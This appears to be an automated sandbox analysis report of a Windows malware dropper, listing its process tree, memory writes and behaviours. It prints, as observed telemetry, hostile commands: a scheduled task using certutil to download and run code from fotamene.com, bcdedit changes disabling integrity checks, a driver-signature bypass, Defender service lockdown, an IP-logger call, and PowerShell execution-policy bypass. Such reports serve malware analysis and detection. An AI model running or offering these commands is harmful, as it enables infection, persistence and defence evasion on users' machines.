Token: SeCreatePagefilePrivilege 3128 Token: SeBackupPrivilege 4260 svchost.exe Token: SeRestorePrivilege 4260 svchost.exe Token: SeShutdownPrivilege 5256 svchost.exe Token: SeCreatePagefilePrivilege 5256 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
setup_10.2_us3.tmpSetup3310.tmpvpn.tmpvict.tmppid process 1420 setup_10.2_us3.tmp 2520 Setup3310.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 3292 vict.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeCEF3.tmp.exepid process 4332 MicrosoftEdge.exe 8 MicrosoftEdgeCP.exe 8 MicrosoftEdgeCP.exe 4032 CEF3.tmp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
df73c80c3b297b161dd6681a354b9392.exemultitimer.exemultitimer.exemultitimer.exetapinstall.exe3aa05242ojx.exesetup_10.2_us3.exe0znomdw24e2.exevpn.exevict.exeSetup3310.exesetup_10.2_us3.tmpcmd.exeM7PPVTFT7.exeseed.sfx.exedescription pid process target process PID 988 wrote to memory of 2484 988 df73c80c3b297b161dd6681a354b9392.exe multitimer.exe PID 988 wrote to memory of 2484 988 df73c80c3b297b161dd6681a354b9392.exe multitimer.exe PID 2484 wrote to memory of 3812 2484 multitimer.exe multitimer.exe PID 2484 wrote to memory of 3812 2484 multitimer.exe multitimer.exe PID 3812 wrote to memory of 2060 3812 multitimer.exe multitimer.exe PID 3812 wrote to memory of 2060 3812 multitimer.exe multitimer.exe PID 2060 wrote to memory of 3260 2060 multitimer.exe 4erji2va4ov.exe PID 2060 wrote to memory of 3260 2060 multitimer.exe 4erji2va4ov.exe PID 2060 wrote to memory of 3144 2060 multitimer.exe 3aa05242ojx.exe PID 2060 wrote to memory of 3144 2060 multitimer.exe 3aa05242ojx.exe PID 3260 wrote to memory of 2660 3260 tapinstall.exe cmd.exe PID 3260 wrote to memory of 2660 3260 tapinstall.exe cmd.exe PID 2060 wrote to memory of 2000 2060 multitimer.exe safebits.exe PID 2060 wrote to memory of 2000 2060 multitimer.exe safebits.exe PID 2060 wrote to memory of 2000 2060 multitimer.exe safebits.exe PID 3144 wrote to memory of 2560 3144 3aa05242ojx.exe 0znomdw24e2.exe PID 3144 wrote to memory of 2560 3144 3aa05242ojx.exe 0znomdw24e2.exe PID 3144 wrote to memory of 2560 3144 3aa05242ojx.exe 0znomdw24e2.exe PID 2060 wrote to memory of 1392 2060 multitimer.exe app.exe PID 2060 wrote to memory of 1392 2060 multitimer.exe app.exe PID 2060 wrote to memory of 1392 2060 multitimer.exe app.exe PID 2060 wrote to memory of 3020 2060 multitimer.exe setup_10.2_us3.exe PID 2060 wrote to memory of 3020 2060 multitimer.exe setup_10.2_us3.exe PID 2060 wrote to memory of 3020 2060 multitimer.exe setup_10.2_us3.exe PID 2060 wrote to memory of 2824 2060 multitimer.exe vict.exe PID 2060 wrote to memory of 2824 2060 multitimer.exe vict.exe PID 2060 wrote to memory of 2824 2060 multitimer.exe vict.exe PID 2060 wrote to memory of 2112 2060 multitimer.exe vpn.exe PID 2060 wrote to memory of 2112 2060 multitimer.exe vpn.exe PID 2060 wrote to memory of 2112 2060 multitimer.exe vpn.exe PID 2060 wrote to memory of 1428 2060 multitimer.exe Setup3310.exe PID 2060 wrote to memory of 1428 2060 multitimer.exe Setup3310.exe PID 2060 wrote to memory of 1428 2060 multitimer.exe Setup3310.exe PID 3020 wrote to memory of 1420 3020 setup_10.2_us3.exe setup_10.2_us3.tmp PID 3020 wrote to memory of 1420 3020 setup_10.2_us3.exe setup_10.2_us3.tmp PID 3020 wrote to memory of 1420 3020 setup_10.2_us3.exe setup_10.2_us3.tmp PID 2560 wrote to memory of 3384 2560 0znomdw24e2.exe 0znomdw24e2.tmp PID 2560 wrote to memory of 3384 2560 0znomdw24e2.exe 0znomdw24e2.tmp PID 2560 wrote to memory of 3384 2560 0znomdw24e2.exe 0znomdw24e2.tmp PID 2112 wrote to memory of 1228 2112 vpn.exe vpn.tmp PID 2112 wrote to memory of 1228 2112 vpn.exe vpn.tmp PID 2112 wrote to memory of 1228 2112 vpn.exe vpn.tmp PID 2824 wrote to memory of 3292 2824 vict.exe vict.tmp PID 2824 wrote to memory of 3292 2824 vict.exe vict.tmp PID 2824 wrote to memory of 3292 2824 vict.exe vict.tmp PID 1428 wrote to memory of 2520 1428 Setup3310.exe Setup3310.tmp PID 1428 wrote to memory of 2520 1428 Setup3310.exe Setup3310.tmp PID 1428 wrote to memory of 2520 1428 Setup3310.exe Setup3310.tmp PID 2060 wrote to memory of 4124 2060 multitimer.exe qlempdtjbuk.exe PID 2060 wrote to memory of 4124 2060 multitimer.exe qlempdtjbuk.exe PID 2060 wrote to memory of 4124 2060 multitimer.exe qlempdtjbuk.exe PID 1420 wrote to memory of 4196 1420 setup_10.2_us3.tmp seed.sfx.exe PID 1420 wrote to memory of 4196 1420 setup_10.2_us3.tmp seed.sfx.exe PID 1420 wrote to memory of 4196 1420 setup_10.2_us3.tmp seed.sfx.exe PID 1420 wrote to memory of 4224 1420 setup_10.2_us3.tmp cmd.exe PID 1420 wrote to memory of 4224 1420 setup_10.2_us3.tmp cmd.exe PID 1420 wrote to memory of 4224 1420 setup_10.2_us3.tmp cmd.exe PID 2660 wrote to memory of 4460 2660 cmd.exe M7PPVTFT7.exe PID 2660 wrote to memory of 4460 2660 cmd.exe M7PPVTFT7.exe PID 4460 wrote to memory of 4524 4460 M7PPVTFT7.exe dw20.exe PID 4460 wrote to memory of 4524 4460 M7PPVTFT7.exe dw20.exe PID 4196 wrote to memory of 4780 4196 seed.sfx.exe seed.exe PID 4196 wrote to memory of 4780 4196 seed.sfx.exe seed.exe PID 4196 wrote to memory of 4780 4196 seed.sfx.exe seed.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\df73c80c3b297b161dd6681a354b9392.exe"C:\Users\Admin\AppData\Local\Temp\df73c80c3b297b161dd6681a354b9392.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Users\Admin\AppData\Local\Temp\RHO5E1JXEA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RHO5E1JXEA\multitimer.exe" 0 30601988b56f78c9.53290271 0 1022⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Users\Admin\AppData\Local\Temp\RHO5E1JXEA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RHO5E1JXEA\multitimer.exe" 1 3.1613501834.602c158a98b903⤵
- Executes dropped EXE
- Adds Run key to start application
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Users\Admin\AppData\Local\Temp\RHO5E1JXEA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RHO5E1JXEA\multitimer.exe" 2 3.1613501834.602c158a98b904⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Users\Admin\AppData\Local\Temp\kproms2kiag\4erji2va4ov.exe"C:\Users\Admin\AppData\Local\Temp\kproms2kiag\4erji2va4ov.exe" 57a764d042bf85⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3260 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\M7PPVTFT73\M7PPVTFT7.exe" 57a764d042bf8 & exit6⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Program Files\M7PPVTFT73\M7PPVTFT7.exe"C:\Program Files\M7PPVTFT73\M7PPVTFT7.exe" 57a764d042bf87⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Users\Admin\AppData\Local\Temp\ekb0yjbbsk1\3aa05242ojx.exe"C:\Users\Admin\AppData\Local\Temp\ekb0yjbbsk1\3aa05242ojx.exe" testparams5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Users\Admin\AppData\Roaming\xljnjfawui1\0znomdw24e2.exe"C:\Users\Admin\AppData\Roaming\xljnjfawui1\0znomdw24e2.exe" /VERYSILENT /p=testparams6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Users\Admin\AppData\Local\Temp\is-5U27E.tmp\0znomdw24e2.tmp"C:\Users\Admin\AppData\Local\Temp\is-5U27E.tmp\0znomdw24e2.tmp" /SL5="$9005C,1049326,58368,C:\Users\Admin\AppData\Roaming\xljnjfawui1\0znomdw24e2.exe" /VERYSILENT /p=testparams7⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:3384 -
C:\Users\Admin\AppData\Local\Temp\ndtdfjux4zr\safebits.exe"C:\Users\Admin\AppData\Local\Temp\ndtdfjux4zr\safebits.exe" /S /pubid=1 /subid=4515⤵
- Executes dropped EXE
PID:2000 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 7406⤵
- Program crash
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\3q5nnt1xylk\app.exe"C:\Users\Admin\AppData\Local\Temp\3q5nnt1xylk\app.exe" /8-235⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1392 -
C:\Users\Admin\AppData\Local\Temp\3q5nnt1xylk\app.exe"C:\Users\Admin\AppData\Local\Temp\3q5nnt1xylk\app.exe" /8-236⤵
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
PID:4984 -
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:2884
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies data under HKEY_USERS
PID:4316 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-237⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1800 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:4816 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F8⤵
- Creates scheduled task(s)
PID:3396 -
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5344 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER9⤵
- Modifies boot configuration data using bcdedit
PID:5928 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:9⤵
- Modifies boot configuration data using bcdedit
PID:5968 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:9⤵
- Modifies boot configuration data using bcdedit
PID:6008 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows9⤵
- Modifies boot configuration data using bcdedit
PID:6048 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe9⤵
- Modifies boot configuration data using bcdedit
PID:6088 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe9⤵
- Modifies boot configuration data using bcdedit
PID:6140 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 09⤵
- Modifies boot configuration data using bcdedit
PID:5208 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn9⤵
- Modifies boot configuration data using bcdedit
PID:5012 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 19⤵
- Modifies boot configuration data using bcdedit
PID:5016 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}9⤵
- Modifies boot configuration data using bcdedit
PID:5216 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast9⤵
- Modifies boot configuration data using bcdedit
PID:5400 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 09⤵
- Modifies boot configuration data using bcdedit
PID:3948 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}9⤵
- Modifies boot configuration data using bcdedit
PID:4308 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy9⤵
- Modifies boot configuration data using bcdedit
PID:5608 -
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v8⤵
- Modifies boot configuration data using bcdedit
PID:5604 -
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe8⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:5592 -
C:\Windows\windefender.exe"C:\Windows\windefender.exe"8⤵
- Executes dropped EXE
PID:6076 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵PID:5208
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵PID:5012
-
C:\Users\Admin\AppData\Local\Temp\otxiwpg3kdi\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\otxiwpg3kdi\setup_10.2_us3.exe" /silent5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Users\Admin\AppData\Local\Temp\is-6PU7L.tmp\setup_10.2_us3.tmp"C:\Users\Admin\AppData\Local\Temp\is-6PU7L.tmp\setup_10.2_us3.tmp" /SL5="$80118,701904,121344,C:\Users\Admin\AppData\Local\Temp\otxiwpg3kdi\setup_10.2_us3.exe" /silent6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1Gusg7"7⤵
- Checks computer location settings
PID:4224 -
C:\Program Files (x86)\FamTips\seed.sfx.exe"C:\Program Files (x86)\FamTips\seed.sfx.exe" -pX7mdks39WE0 -s17⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Users\Admin\AppData\Local\Temp\xxb2mpoogzj\vict.exe"C:\Users\Admin\AppData\Local\Temp\xxb2mpoogzj\vict.exe" /VERYSILENT /id=5355⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Users\Admin\AppData\Local\Temp\is-UJOEP.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-UJOEP.tmp\vict.tmp" /SL5="$301D8,870426,780800,C:\Users\Admin\AppData\Local\Temp\xxb2mpoogzj\vict.exe" /VERYSILENT /id=5356⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:3292 -
C:\Users\Admin\AppData\Local\Temp\is-Q689Q.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-Q689Q.tmp\winlthst.exe" 5357⤵
- Executes dropped EXE
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\uP11qo3Gz.exe"C:\Users\Admin\AppData\Local\Temp\uP11qo3Gz.exe"8⤵
- Executes dropped EXE
- NTFS ADS
PID:5952 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" 1.vbs9⤵PID:6056
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min extrac32 readme.txt:meta /Y /E /L C:\Users\Admin\AppData\Local\Temp | more & wscript C:\Users\Admin\AppData\Local\Temp\start.vbs10⤵PID:6140
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" start /min extrac32 readme.txt:meta /Y /E /L C:\Users\Admin\AppData\Local\Temp "11⤵PID:4240
-
C:\Windows\system32\extrac32.exeextrac32 readme.txt:meta /Y /E /L C:\Users\Admin\AppData\Local\Temp12⤵PID:5316
-
C:\Windows\system32\more.commore11⤵PID:5140
-
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Local\Temp\start.vbs11⤵PID:5608
-
C:\Users\Admin\AppData\Local\Temp\qweim1aqvyk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\qweim1aqvyk\Setup3310.exe" /Verysilent /subid=5775⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Users\Admin\AppData\Local\Temp\43ro2uaegjz\qlempdtjbuk.exe"C:\Users\Admin\AppData\Local\Temp\43ro2uaegjz\qlempdtjbuk.exe"5⤵
- Executes dropped EXE
PID:4124 -
C:\Users\Admin\AppData\Local\Temp\eqaekkjxqgz\vpn.exe"C:\Users\Admin\AppData\Local\Temp\eqaekkjxqgz\vpn.exe" /silent /subid=4825⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2112
-
C:\Users\Admin\AppData\Local\Temp\is-S0J52.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-S0J52.tmp\Setup3310.tmp" /SL5="$4006A,802346,56832,C:\Users\Admin\AppData\Local\Temp\qweim1aqvyk\Setup3310.exe" /Verysilent /subid=5771⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2520 -
C:\Users\Admin\AppData\Local\Temp\is-2NDF2.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2NDF2.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
PID:5024 -
C:\Users\Admin\AppData\Local\Temp\is-Q0FEC.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q0FEC.tmp\Setup.tmp" /SL5="$30240,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-2NDF2.tmp\Setup.exe" /Verysilent3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5064
-
C:\Users\Admin\AppData\Local\Temp\is-O3BFQ.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-O3BFQ.tmp\vpn.tmp" /SL5="$3005A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\eqaekkjxqgz\vpn.exe" /silent /subid=4821⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1228 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:2776
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:3936
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:4848 -
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5556 -
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5644
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 6521⤵PID:4524
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4780
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\43ro2uaegjz\qlempdtjbuk.exe"1⤵PID:4804
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30002⤵
- Runs ping.exe
PID:4896
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4332
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4428
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:8
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4300 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2bddfa64-d548-6245-a31a-a86f860c7f6e}\oemvista.inf" "9" "4d14a44ff" "000000000000016C" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:860 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000016C"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:5200
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5256
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
PID:5248
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5464
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:5788 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:2632
-
C:\Users\Admin\AppData\Local\Temp\33C3.exeC:\Users\Admin\AppData\Local\Temp\33C3.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5664 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\fbcdc5df-e3bd-4382-87b0-4d925fbbd857" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:5640 -
C:\Users\Admin\AppData\Local\Temp\33C3.exe"C:\Users\Admin\AppData\Local\Temp\33C3.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
PID:4948 -
C:\Users\Admin\AppData\Local\9b169881-1397-4eb8-a802-33f26dffdfcf\updatewin1.exe"C:\Users\Admin\AppData\Local\9b169881-1397-4eb8-a802-33f26dffdfcf\updatewin1.exe"3⤵
- Executes dropped EXE
PID:6096 -
C:\Users\Admin\AppData\Local\9b169881-1397-4eb8-a802-33f26dffdfcf\updatewin1.exe"C:\Users\Admin\AppData\Local\9b169881-1397-4eb8-a802-33f26dffdfcf\updatewin1.exe" --Admin4⤵
- Executes dropped EXE
PID:5976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned5⤵PID:5500
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"5⤵PID:4480
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\script.ps16⤵PID:592
-
